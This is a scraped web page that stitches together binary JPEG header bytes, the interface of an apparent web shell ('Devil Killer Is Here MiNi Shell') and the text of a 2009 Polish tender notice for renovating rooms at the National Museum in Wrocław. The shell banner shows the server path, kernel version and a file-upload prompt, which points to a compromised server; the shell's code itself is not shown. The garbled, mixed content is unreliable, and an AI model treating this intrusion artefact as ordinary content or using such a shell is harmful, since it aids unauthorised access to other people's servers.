JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090910/314176-N-2009.html

<p class="kh_header"><b>Wrocław: Przebudowa pomieszczeń działu grafiki w budynku Muzeum Narodowego we Wrocławiu</b><br>
<b>Numer ogłoszenia: 314176 - 2009; data zamieszczenia: 10.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe we Wrocławiu , Pl. Powstańców Warszawy 5, 50-153 Wrocław, woj. dolnośląskie, tel. 071 3435643, 3433308, faks 071 3725159.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnwr.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa pomieszczeń działu grafiki w budynku Muzeum Narodowego we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane pn.: 	
Przebudowa pomieszczeń działu grafiki w budynku  Muzeum Narodowego we Wrocławiu.

2.	Zakres prac objętych zamówieniem:
1)	Wzmocnienie istniejącego stropu polegające na wykonaniu i montażu stalowego rusztu nośnego umożliwiającego przenoszenie zwiększonych oraz dynamicznych obciążeń związanych z wyposażeniem pomieszczenia w przesuwane regały archiwizacyjne. 
2)	Roboty ogólnobudowlane: rozbiórkowe, montażowe i wykończeniowe oraz w niewielkim zakresie roboty elektryczne związane z oświetleniem pomieszczeń.
3)	Dostawa i montaż przesuwnych i stałych regałów archiwizacyjnych.
4)	Powierzchnia użytkowa pomieszczeń działu grafiki wynosi: 66,1 m2  
	
3.	Szczegółowy zakres zamówienia określają: 
1)	dokumentacja projektowa, wykonana przez BIURO PROJEKTOWO- HANDLOWE mgr inż. arch. Piotr Golus , ul. Kosynierów Gdyńskich 64/4,  na którą składa się: Projekt Wykonawczy, Specyfikacja techniczna wykonania i odbioru robót, Przedmiary robót, stanowiąca załącznik nr 2 do SIWZ.
2)	Opis konstrukcyjno-technologiczny przesuwnych i stałych regałów archiwizacyjnych (typu Compactus lub równoważne)  stanowiący załącznik nr 3 do SIWZ.
UWAGA!
Dobrane przez projektanta materiały konkretnych producentów, wszelkie nazwy własne urządzeń i materiałów przywołane w specyfikacji technicznej wykonania i odbioru robót, Zamawiający traktuje zgodnie z art. 29 ust.3 ustawy Prawo zamówień publicznych jako określenie parametrów przedmiotu zamówienia za pomocą podania standardu, dopuszczając do zastosowania inne odpowiedniki rynkowe równoważne ze wskazanymi z zastrzeżeniem jednak, że nie będą one gorsze pod względem parametrów technicznych i jakościowych od wskazanych przez projektanta, zagwarantują uzyskanie takich samych (lub lepszych) parametrów technicznych oraz będą posiadać niezbędne atesty i dopuszczenia do stosowania.
Uwaga: obowiązek udowodnienia równoważności zgodnie z art. 30 ust. 5 ustawy Pzp. należy do Wykonawcy.

W związku z powyższym, Zamawiający wymaga, aby Wykonawca,  proponując w ofercie zastosowanie przesuwnych i stałych regałów archiwizacyjnych równoważnych w stosunku do zaproponowanych w projekcie:
1)	wypełnił Załącznik nr 5 Formularza ofertowego pn. Opis konstrukcyjno-technologiczny przesuwnych i stałych regałów archiwizacyjnych,
2)	dołączył do oferty wymagane atesty i certyfikaty oraz świadectwa oferowanych regałów, 
na potwierdzenie, że zaproponowane regały są równoważne w zakresie oczekiwań Zamawiającego. Oczekiwania dotyczące regałów  zostały opisanie szczegółowo w Projekcie i Załączniku nr 3 SIWZ. 

4.	Zamawiający informuje, że prace będą wykonywane na czynnym obiekcie. Wykonawca zobowiązany jest do takiego ich prowadzenia, aby nie zakłócać pracy muzeum - realizacja zamówienia musi być prowadzona przy bardzo ścisłej współpracy z Zamawiającym przy zachowaniu maksimum bezpieczeństwa, jakie powinno być stosowane przy pracach w obiekcie muzealnym.  Wszelkie konieczne prace należy prowadzić po uprzednim uzgodnieniu z Zamawiającym. Wykonawca będzie odpowiadał za wszelkie ewentualne straty spowodowane nienależytym zabezpieczeniem obiektu, działaniami osób trzecich w wyniku niewłaściwego zabezpieczenia placu robót. 

5.	W związku z tym, że prace będą wykonywane w budynku czynnym, Wykonawca jest zobowiązany do: 
1)	zabezpieczenia terenu, na którym prowadzone będą prace, w taki sposób aby umożliwiona była praca obiektu;
2)	systematyczne porządkowanie miejsc wykonywania robót;
3)	prowadzenie robót w sposób nieuciążliwy nie powodujący zagrożeń dla bezpieczeństwa pracowników i zwiedzających.
 
7.	Zamawiający umożliwia Wykonawcy zapoznanie się z pomieszczeniami działu grafiki w  budynku Muzeum Narodowego we Wrocławiu, w zakresie pozwalającym na prawidłowe wykonanie zamówienia - wizja lokalna potencjalnego wykonawcy jest możliwa, po telefonicznym uzgodnieniu terminu z przedstawicielem Zamawiającego Panem Krzysztofem Michalskim tel. 0-71 343-33-08.

8.	Cena oferty musi obejmować wszelkie koszty robót towarzyszących oraz prac tymczasowych niezbędnych do zrealizowania zamówienia, wynikających wprost z kosztorysu ofertowego jak również w nich nie ujętych, a bez których nie można wykonać zamówienia.
Będą to między innymi koszty: robót przygotowawczych, robót porządkowych, wywiezienia i utylizacji odpadów, zabezpieczeń istniejących elementów obiektu budowlanego oraz zainstalowanych urządzeń, zabezpieczeń bhp oraz ppoż., utrzymania zaplecza, dostawy na teren budowy wyrobów budowlanych i innych wyrobów oraz ich zabezpieczenia w okresie przed wbudowaniem, zabezpieczenia narzędzi i urządzeń Wykonawcy, przeprowadzenia wymaganych prób oraz badań, skompletowania dokumentacji powykonawczej oraz innych czynności niezbędnych do wykonania przedmiotu zamówienia.
Skutki finansowe jakichkolwiek błędów w przedmiarze robót, obciążają Wykonawcę zamówienia - musi on przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. 

9.	Ze względu na cenę oferty ryczałtową, przedmiary robót, załączone jako część dokumentacji projektowej są traktowane jako dokument informacyjno-pomocniczy, mający za zadanie min. ułatwić Wykonawcom obliczenie wynagrodzenia. 

10.	Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany będzie dołączyć do umowy jako załącznik Kosztorys ofertowy, sporządzony na podstawie załączonych do SIWZ przedmiarów robót - należy podać wartości dla wszystkich pozycji wymienionych w przedmiarze oraz ogólną wartość kosztorysową robót budowlanych. Kosztorys ofertowy będzie wykorzystany jako podstawa do rozliczenia robót w przypadku ich przerwania i konieczności odstąpienia od umowy.

11.	Przy wykonywaniu robót budowlanych należy stosować wyroby budowlane, spełniające wymagania określone w Specyfikacji Technicznej Wykonania i Odbioru Robót budowlanych, załączonej do niniejszej SIWZ. Wszystkie użyte materiały muszą posiadać aprobaty techniczne, certyfikaty, znaki bezpieczeństwa zgodne z wymaganiami obowiązującego prawa.

12.	Wykonawca realizując niniejszą umowę jest wytwórcą odpadów w rozumieniu przepisów ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2007 r. Nr 39, poz. 251 z późn. zm.) i przechodzą na niego obowiązki określone tymi przepisami oraz przepisami ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 z późn. zm.).

13.	Wykonawca jest zobowiązany do wykonania przedmiotu zamówienia własnymi siłami lub przy udziale podwykonawcy w części zamówienia, która obejmuje dostawę i montaż przesuwanych regałów archiwizacyjnych. Zamawiający żąda wskazania przez Wykonawcę w ofercie (w Załączniku nr 6 Formularza ofertowego) tę części zamówienia, której wykonanie powierzy podwykonawcom. 

14.	Warunki płatności: przelewem bankowym w terminie 30 dni od dnia dostarczenia faktury Zamawiającemu wraz z kompletem dokumentów rozliczeniowych. 

15.	Zamawiający wymaga udzielenia gwarancji jakości (licząc od dnia odbioru końcowego):
1)	Na wykonane roboty budowlane - na okres 36 miesięcy (gwarancja obejmuje wady materiałowe jak i wady w wykonawstwie),
2)	Na zamontowane urządzenia obowiązuje gwarancja producenta zamontowanych urządzeń z wyjątkiem zamontowanych przesuwanych regałów archiwizacyjnych, których gwarancja nie może być mniejsza niż 5 lat. 

16.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, pod warunkiem wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:

1)	konieczności zmiany terminu realizacji Kontraktu na roboty budowlane, w przypadku wystąpienia tzw. Siły Wyższej tj. wyjątkowego zdarzenia lub okoliczności, warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót a także w przypadku wystąpienia robót dodatkowych koniecznych do wykonania podstawowego zakresu zadania oraz konieczności wprowadzenia zmian w dokumentacji projektowej (fakt ten zostanie potwierdzony wpisem do dziennika budowy). Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).

2)	konieczność zmiany zakresu prac, wynikająca z wprowadzenia w dokumentacji projektowej istotnych lub nieistotnych zmian w rozumieniu ustawy Prawo budowlane;

3)	konieczność wykonania robót zamiennych niewykraczających poza zakres przedmiotu zamówienia i koniecznych dla wykonania całości robót i uzyskania założonego efektu użytkowego;

4)	zmiana danych podmiotowych dotyczących Wykonawcy robót budowlanych, lokalizacji siedziby biura Wykonawcy;

5)	zmiany danych osobowych - zmiany osób - kierowników robót, wskazanych w ofercie Załączniku nr 3 oraz inspektorów nadzoru Zamawiającego;

6)	Wszystkie powyższe postanowienia opisane (pkt 1-5) stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmiany. 

7)	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego),
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami.

17.	Pozostałe warunki podano we wzorze umowy załączonym do Specyfikacji Istotnych Warunków Zamówienia jako załącznik nr 1..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.26.20.00-1, 45.26.25.22-6, 45.42.10.00-4, 45.41.00.00-4, 45.44.21.00-8, 45.43.21.10-8, 45.31.12.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w Art. 22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych oraz nie podlegają wykluczeniu z ubiegania się o zamówienie na podstawie Art.24 ust.1 i 2 tej ustawy. 
W przetargu mogą wziąć udział wykonawcy, którzy winni spełniać następujące wymagania: 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1)	Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, czyli: 

1)	wykażą, że w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia wykonali należycie, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną w budynkach użyteczności publicznej, odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. polegającą na wykonaniu prac ogólnobudowlanych i elektrycznych o wartości nie mniejszej niż  200 000,00 zł. brutto w ramach jednej umowy (należy dołączyć wykaz robót z wyszczególnieniem ich rodzaju i zakresu, wartości, daty i miejsca wykonania robót, nazwy i adresu zleceniodawcy oraz dokumenty potwierdzające, że wskazane roboty budowlane zostały wykonane należycie - referencje). 

Pod pojęciem budynek użyteczności publicznej należy rozumieć budynek określony zgodnie z definicją budynku użyteczności publicznej zawartej w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie.

2)	wykażą, że dysponują lub przedstawiając pisemne zobowiązanie innego podmiotu, że będą dysponować dla potrzeb niniejszego zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne do wykonania zamówienia kwalifikacje zawodowe tj. posiadającymi, zgodnie z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2003r. Nr 207 poz.2016 z późn. zm.) uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej oraz  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, a także należącymi do Okręgowej Izby Inżynierów Budownictwa.

3)	wykażą że kierownik budowy o specjalności konstrukcyjno-budowlanej, zgodnie z § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych( Dz.U. 2004 Nr 150, poz.1579) odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (przedstawi dokument wystawiony przez ówczesnego pracodawcę lub posiada zaświadczenie o kwalifikacjach uzyskanych na podstawie wcześniejszych rozporządzeń Ministra Kultury i Sztuki) . 


3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2.

II. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie oświadczeń lub dokumentów załączonych do oferty - według zasady spełnia lub nie spełnia. Warunki udziału w postępowaniu zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty i oświadczenia, o których mowa w Dziale IX SIWZ. Ocena złożonych oświadczeń i dokumentów obejmowała będzie ich badanie pod względem formalnoprawnym, a także czy informacje w nich zawarte potwierdzają spełnienie warunków określonych przez Zamawiającego. Niespełnienie przez wykonawcę któregoś z warunków uczestnictwa w zamówieniu publicznym spowoduje wykluczenie tego wykonawcy a jego oferta uznana  zostanie za odrzuconą.

III. Wykonawcy zgodnie z art. 23 ustawy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wymagane jest:
1.	Ustanowienie pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć oryginał pełnomocnictwa lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza).
2.	Złożenie wraz z ofertą, przez każdego Wykonawcę występującego wspólnie, oświadczenia o niepodleganiu wykluczeniu z postępowania (zał. nr 1a Formularza Ofertowego) oraz udokumentowanie, że razem spełniają wymagania art. 22 ust. 1 dotyczące wiedzy, doświadczenia, potencjału technicznego (wraz z dokumentami potwierdzającymi, zgodnie z zapisem w rozdz. IX SIWZ).
3.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
4.	Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy (art. 141 ustawy Pzp).
5.	Wszelka korespondencja prowadzona będzie z Wykonawcą występującym jako pełnomocnik pozostałych (Lider).
6.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani przyjąć pisemne porozumienie wszystkich Wykonawców. W tym celu przed podpisaniem umowy o niniejsze zamówienie są oni zobowiązani przedstawić Zamawiającemu stosowną umowę cywilno-prawną (umowa Konsorcjum). Umowa ta powinna określać: zakres obowiązków każdego z Wykonawców przy realizacji Umowy z Zamawiającym, termin związania umową, na czas nie krótszy niż czas wynikający z Umowy z Zamawiającym, wskazanie Pełnomocnika, zapis o wspólnej i solidarnej odpowiedzialności w zakresie realizacji przedmiotu Umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Wykonawca jest zobowiązany złożyć wypełniony i podpisany FORMULARZ OFERTOWY wraz z Załącznikami, którego wzór  załączono do SIWZ,  oraz wymagane dokumenty: 

1.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp zamawiający żąda złożenia wraz z ofertą: 

1)	Oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp - Załącznik nr 1 Formularza Ofertowego. 

2)	Oświadczenia o niepodleganiu wykluczeniu, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp - Załącznik nr 1a Formularza Ofertowego. 

3)	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert -  dołączyć do Załącznika nr 1 Formularza ofertowego w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawniona do reprezentacji Wykonawcy w obrocie gospodarczym.
W przypadku: 
a) Podmiotów posiadających osobowość prawną jak i spółek prawa handlowego nie posiadających osobowości prawnej - należy załączyć odpis z Krajowego Rejestru Sądowego. 
b) Osób fizycznych wykonujących działalność gospodarczą - należy załączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej.
c) Spółki cywilnej - należy załączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej każdego wspólnika.
d) Konsorcjum - oferta musi zawierać odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej dla każdego z członków konsorcjum osobno. 

4)	Oryginału pełnomocnictwa ( lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza) - dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę (konsorcjum):
a)	dokument pełnomocnictwa dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów złożonych w ofercie,
b)	dokument pełnomocnictwa do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisany przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców.
UWAGA! W przypadku konsorcjum podmioty te są zobowiązane do ustanowienia pełnomocnika a także złożenia zapewnienia (zobowiązania), że za wykonanie umowy będą odpowiadać solidarnie i że przed podpisaniem umowy z Zamawiającym zawrą umowę regulującą zasady ich współpracy (dołączyć do załącznika nr 1 do oferty) - umowa taka może być zawarta już na etapie składania ofert; 
Pełnomocnictwo musi być załączone w oryginale i podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza. Każde pełnomocnictwo powinno wskazywać pełnomocnika i zawierać następujące dane: nazwę przedmiotu zamówienia i Zamawiającego, podmiotu udzielającego pełnomocnictwa (tj. Wykonawcy), datę jego udzielenia oraz podpisy osób upoważnionych do reprezentowania danego Wykonawcy wg zasad określonych w dokumencie rejestrowym, a także informację o zakresie pełnomocnictwa (tj. czy zostało udzielone do reprezentowania w postępowaniu o udzielenie zamówienia, czy też do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego).
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum), załączone pełnomocnictwo musi być podpisane przez wszystkich wykonawców, którzy tworzą konsorcjum.

2.	W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia, Wykonawcy zobowiązani są do  przedłożenia wraz z ofertą: 

1)	Wykazu wykonanych robót budowlanych w budynkach użyteczności publicznej w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (okres ten liczony jest od terminu składania ofert wstecz), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierającego co najmniej jedną  robotę budowlaną polegającą na wykonaniu prac ogólnobudowlanych i elektrycznych o wartości  nie mniejszej niż 200 000,00 zł. brutto w ramach jednej umowy, z wyszczególnieniem ich rodzaju, zakresu prac, wartości, daty i miejsca wykonania robót, nazwy i adresu zleceniodawcy  - należy wypełnić zgodnie z podanym wzorem tabelę - Załącznik nr 3 Formularza Ofertowego.

2)	Referencji lub innych dokumentów potwierdzających, że roboty wskazane w Załączniku nr 3 Formularza Ofertowego zostały wykonane z należytą starannością; dołączyć, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym,

3)	Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu niniejszego zamówienie wraz z danymi na temat ich kwalifikacji zawodowych tj. uprawnień w kierowaniu robotami o specjalności konstrukcyjno-budowlanej oraz instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, niezbędnych do wykonania zamówienia, oraz informacjami na temat ich doświadczenia, wykształcenia - Załącznik nr 4 Formularza ofertowego.

4)	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 3). (tj. w Załączniku nr 4 Formularza Ofertowego), Wykonawca wskazał osobę, którą będzie dysponował.

